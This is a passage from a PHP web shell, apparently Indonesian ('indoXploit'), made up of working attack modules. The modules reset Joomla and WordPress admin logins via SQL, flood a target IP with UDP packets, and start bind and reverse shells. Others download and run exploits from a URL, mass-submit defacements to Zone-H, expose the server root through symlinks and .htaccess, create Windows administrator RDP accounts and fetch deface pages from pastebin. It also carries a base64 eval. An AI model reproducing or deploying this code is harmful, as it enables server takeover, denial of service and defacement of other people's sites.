"; sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "
"; } } else { echo "
"; echo " Tipe Sabun:
BiasaMassal
Folder:

Filename:

Index File:

"; } }elseif ($_GET['a']=='jrp') { echo "

joomla reset password


"; if(empty($_POST['pwd'])){ echo "
Connect to mySQL
  Host
  Database
  username
  password
  new user
  new password(12345)




"; }else{ $localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $pwd = $_POST['pwd']; $admin = $_POST['admin']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $hash = crypt($pwd); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error()); $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error()); if($SQL){ echo "Succesfully! password : 12345"; } } }elseif ($_GET['a']=='wprp') { echo "

wordpress reset password


"; if(empty($_POST['pwd'])){ echo "
Connect to mySQL server
  Hostname
  Database
  username
  password
  User baru
  Pass Baru




"; }else{ $localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $pwd = $_POST['pwd']; $admin = $_POST['admin']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $hash = crypt($pwd); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error()); if($a4s){ echo " Successfully! password changed! "; } } }elseif ($_GET['a']=='ddos') { echo"

DDoS Tools



"; echo'
IP Target:
Time:
Port:

'; $submit = $_POST['fire']; if (isset($submit)) { $packets = 0; $ip = $_POST['ip']; $rand = $_POST['port']; set_time_limit(0); ignore_user_abort(FALSE); $exec_time = $_POST['time']; $time = time(); print "Flooded: $ip on port $rand

"; $max_time = $time+$exec_time; for($i=0;$i<65535;$i++){ $out .= "X"; } while(1){ $packets++; if(time() > $max_time){ break; } $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n"; } }elseif ($_GET['a']=='net') { if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "

Process found running, backdoor setup successfully.

"; } else { $msg = "

Process not found running, backdoor not setup successfully.

"; } } // bind connect with perl elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "

Process found running, backdoor setup successfully.

"; } else { $msg = "

Process not found running, backdoor not setup successfully.

"; } } // back connect with c elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } // back connect with perl elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } echo'

NetSploit

Port BindingConnect BackLoad and Exploit
'; echo'
Port
Password
Use

'; echo'
'; echo'
IP
Port
Use

'; echo'
'; echo'
url
cmd
'; echo'
'.$msg.'
'; }elseif ($_GET['a']=='zh') { echo'

Zone-H Mass Notifer

'; echo'


'; $url = explode("\r\n", $_POST['url']); $go = $_POST['go']; function kirim($target,$hacker) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_URL, "http://zone-h.org/notify/single"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array( "defacer" => $hacker, "domain1" => $target, "hackmode" => "1", "reason" => "1", )); $res = curl_exec($ch); curl_close($ch); return preg_match("/OK<\/font><\/li>/", $res); } if($go) { foreach($url as $sites) { if(kirim($sites,$_POST['depecer'])) { echo "
[ OK ] => $sites
"; } else { echo "
[ ERROR ] => $sites
"; } } } }elseif ($_GET['a']=='em') { $e=function_exists('mail'); if($e){ echo "

Email


"; echo"
from :
For:
Subject:
COntent:
"; }else{ echo" mail() function does not exists in this website!"; } if(isset($_POST['sent'])){ if(mail($_POST['for'],$_POST['subject'],$_POST['cont'],$_POST['from'])){ echo "send!!".$_POST['for']; }else{ echo"failed !!!"; } } }elseif ($_GET['a']=='sym') { system('ln -s / achan.txt'); $hta ="Options Indexes FollowSymLinks\nDirectoryIndex ssssss.htm\nAddType txt .php\nAddHandler txt .php"; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,$hta); $sym = symlink("/","achan.txt"); $rt="
touch me senpai..
"; echo "


Done.. !
".$rt; }elseif ($_GET['a']=='rdp') { if(strtolower(substr(PHP_OS, 0, 3)) === 'win') { echo "

Remote Desktop Protocol Tools

"; if($_POST['create']) { $user = htmlspecialchars($_POST['user']); $pass = htmlspecialchars($_POST['pass']); if(preg_match("/$user/", exe("net user"))) { echo "[INFO] -> user $user already exists"; } else { $add_user = exe("net user $user $pass /add"); $add_groups1 = exe("net localgroup Administrators $user /add"); $add_groups2 = exe("net localgroup Administrator $user /add"); $add_groups3 = exe("net localgroup Administrateur $user /add"); echo "[ RDP ACCOUNT INFO ]
------------------------------
IP: ".gethostbyname($_SERVER['HTTP_HOST'])."
Username: $user
Password: $pass
------------------------------

[ STATUS ]
------------------------------
"; if($add_user) { echo "[add user] -> Successfully :D
"; } else { echo "[add user] -> Failed !
"; } if($add_groups1) { echo "[add localgroup Administrators] -> Successfully :D
"; } elseif($add_groups2) { echo "[add localgroup Administrator] -> Successfully :D
"; } elseif($add_groups3) { echo "[add localgroup Administrateur] -> Successfully :D
"; } else { echo "[add localgroup] -> Failed !
"; } echo "------------------------------
"; } } elseif($_POST['s_opsi']) { $user = htmlspecialchars($_POST['r_user']); if($_POST['opsi'] == '1') { $cek = exe("net user $user"); echo "Checking username $user ....... "; if(preg_match("/$user/", $cek)) { echo "[ already Exists ]
------------------------------

$cek
"; } else { echo "[ Not Exists ]"; } } elseif($_POST['opsi'] == '2') { $cek = exe("net user $user achan"); if(preg_match("/$user/", exe("net user"))) { echo "[change password: achan] -> "; if($cek) { echo "Successfully :D"; } else { echo "Successfully :D"; } } else { echo "[INFO] -> user $user Not Exists"; } } elseif($_POST['opsi'] == '3') { $cek = exe("net user $user /DELETE"); if(preg_match("/$user/", exe("net user"))) { echo "[remove user: $user] -> "; if($cek) { echo "Successfully :D"; } else { echo "Failed :p"; } } else { echo "[INFO] -> user $user not exists"; } } else { // } } else { echo "-- Create RDP --
Username:
Password:
-- Option --
Username:
Options:
"; } }else{ echo "

This Tools Just Support in Windows Server.

"; } }elseif ($_GET['a']=='wos') { echo "

WithOutShadow Priv8 Script Deface

filename :
"; if(isset($_POST['wos'])){ $fp=fopen($_POST['wos'],"w"); $isi=file_get_contents('http://pastebin.com/raw/0Fm2SLTp'); if(fwrite($fp,$isi)){ echo ""; } fclose($fp); } }elseif ($_GET['a']=='ps') { echo "

PeSeC Priv8 Script Deface

filename :
"; if(isset($_POST['ps'])){ $fp=fopen($_POST['ps'],"w"); $isi=file_get_contents('http://pastebin.com/raw/SDHE0W4T'); if(fwrite($fp,$isi)){ echo ""; } fclose($fp); } }elseif ($_GET['a']=='fr') { ob_start(); function reverse($url) { $ch = curl_init("http://domains.yougetsignal.com/domains.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket="); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POST, 1); $resp = curl_exec($ch); $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) )))); $array = explode(",,", $resp); unset($array[0]); foreach($array as $lnk) { $lnk = "http://$lnk"; $lnk = str_replace(",", "", $lnk); echo $lnk."\n"; ob_flush(); flush(); } curl_close($ch); } function cek($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $resp = curl_exec($ch); return $resp; } $cwd = getcwd(); $ambil_user = explode("/", $cwd); $user = $ambil_user[2]; if($_POST['reverse']) { $site = explode("\r\n", $_POST['url']); $file = $_POST['file']; foreach($site as $url) { $cek = cek("$url/~$user/$file"); if(preg_match("/hacked/", $cek)) { echo "
URL: $url/~$user/$file -> Fake Root!
"; } } } else { echo "

Fake Root

By : indoXploit
Filename:

User:

Domain:

"; } }elseif ($_GET['a']=='themes') { $i=$_GET['i']; $c=$_GET['col']; if(empty($c)){ // ini bukan log atau semacamnya kok, ini cuma html doang -_-" kalo gk percaya decode aja. // alesan di encode biar waktu ganti tema ini gak ikut ke ganti. @eval(base64_decode("ZWNobyAiPGRpdiBjbGFzcz0ndzMtY29udGFpbmVyIHczLWNlbnRlcic+DQoJCTxoMyBjbGFzcz0ndzMtcmVkIHczLXRleHQtc2hhZG93IHczLXRleHQtd2hpdGUnPkdsb2JhbCBDb2xvcjwvaDM+IjsNCgllY2hvJyA8ZGl2IGNsYXNzPSJ3My1kcm9wZG93bi1ob3ZlciI+DQogIDxhIGNsYXNzPSJ3My1yZWQgdzMtYnRuIiBzdHlsZT0id2lkdGg6MzAwcHg7Ij5TRUxFQ1QgVEhFTUVTPC9hPg0KICA8ZGl2IGNsYXNzPSJ3My1kcm9wZG93bi1jb250ZW50IHczLWJvcmRlciIgc3R5bGU9IndpZHRoOjMwMHB4OyI+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1yZWQiICBjbGFzcz0idzMtcmVkIj5SRUQ8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1waW5rIiAgY2xhc3M9InczLXBpbmsiPlBJTks8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1vcmFuZ2UiIGNsYXNzPSJ3My1vcmFuZ2UiPk9SQU5HRTwvYT4NCiAgICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD15ZWxsb3ciICBjbGFzcz0idzMteWVsbG93Ij5ZRUxMT1c8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1ncmVlbiIgIGNsYXNzPSJ3My1ncmVlbiI+R1JFRU48L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD10ZWFsIiBjbGFzcz0idzMtdGVhbCI+VEVBTDwvYT4NCiAgICAgICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1jeWFuIiAgY2xhc3M9InczLWN5YW4iPkNZQU48L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1saW1lIiAgY2xhc3M9InczLWxpbWUiPkxJTUU8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1ibHVlIiBjbGFzcz0idzMtYmx1ZSI+QkxVRTwvYT4NCiAgICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1pbmRpZ28iICBjbGFzcz0idzMtaW5kaWdvIj5JTkRJR088L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1wdXJwbGUiICBjbGFzcz0idzMtcHVycGxlIj5QVVJQTEU8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1raGFraSIgY2xhc3M9InczLWtoYWtpIj5LSEFLSTwvYT4NCiAgPC9kaXY+DQo8L2Rpdj4gJzs=")); }else{ $fn=str_replace("/","",$_SERVER['SCRIPT_NAME']); $gc=file_get_contents($fn); $co=str_replace("indigo",$c,$gc); $fp=fopen($fn,"w"); if(fwrite($fp, $co)){ echo ""; }else{ echo "gagal"; } fclose($fp); } }elseif ($_GET['a']=='pass') { function a_gantipass($old,$new){ $file=str_replace("/","",$_SERVER['SCRIPT_NAME']); $getc=file_get_contents($file); $pw=str_replace("".$old."","".$new."",$getc); $fp=fopen($file,"w"); return fwrite($fp,$pw); fclose($fp); } echo "

Change Password

"; echo "
"; echo ""; echo""; echo"
Old password:
New password:
"; if(isset($_POST['sbmt'])){ $plama=md5($_POST['op']); $pbaru=md5($_POST['np']); if(a_gantipass($plama,$pbaru)){ echo ""; return session_destroy(); } } } } $end_html_a ="



"; $end_html_a.=''; $end_html_a.=''; echo $end_html_a; ?>